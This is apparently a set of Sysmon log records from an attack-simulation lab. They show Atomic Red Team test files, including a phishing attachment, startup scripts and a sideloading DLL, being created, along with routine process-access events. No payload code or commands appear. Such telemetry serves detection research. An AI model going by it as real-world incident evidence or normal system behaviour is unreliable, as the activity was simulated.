{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.868\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\jsestartup.jse\r\nCreationUtcTime: 2020-08-01 06:55:12.868","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.868","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\jsestartup.jse","CreationUtcTime":"2020-08-01 06:55:12.868","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.868\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\vbsstartup.vbs\r\nCreationUtcTime: 2020-08-01 06:55:12.868","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.868","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\vbsstartup.vbs","CreationUtcTime":"2020-08-01 06:55:12.868","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:13.009\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1559.002\\src\\PowerShell_Script_For_DDE_Document.ps1\r\nCreationUtcTime: 2020-08-01 06:55:13.009","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:13.009","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1559.002\\src\\PowerShell_Script_For_DDE_Document.ps1","CreationUtcTime":"2020-08-01 06:55:13.009","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:13.055\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1564.004\\src\\test.ps1\r\nCreationUtcTime: 2020-08-01 06:55:13.055","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:13.055","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1564.004\\src\\test.ps1","CreationUtcTime":"2020-08-01 06:55:13.055","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:13.071\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1566.001\\bin\\PhishingAttachment.xlsm\r\nCreationUtcTime: 2020-08-01 06:55:13.071","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:13.071","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1566.001\\bin\\PhishingAttachment.xlsm","CreationUtcTime":"2020-08-01 06:55:13.071","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:13.087\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\GUP.exe\r\nCreationUtcTime: 2020-08-01 06:55:13.087","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:13.087","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\GUP.exe","CreationUtcTime":"2020-08-01 06:55:13.087","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:13.102\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\libcurl.dll\r\nCreationUtcTime: 2020-08-01 06:55:13.102","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:13.102","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\libcurl.dll","CreationUtcTime":"2020-08-01 06:55:13.102","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:13.118\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.009\\bin\\WindowsServiceExample.exe\r\nCreationUtcTime: 2020-08-01 06:55:13.118","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:13.118","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.009\\bin\\WindowsServiceExample.exe","CreationUtcTime":"2020-08-01 06:55:13.118","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:13.524\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:13.524","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.196\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.196","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.196\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.196","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.196\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.196","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
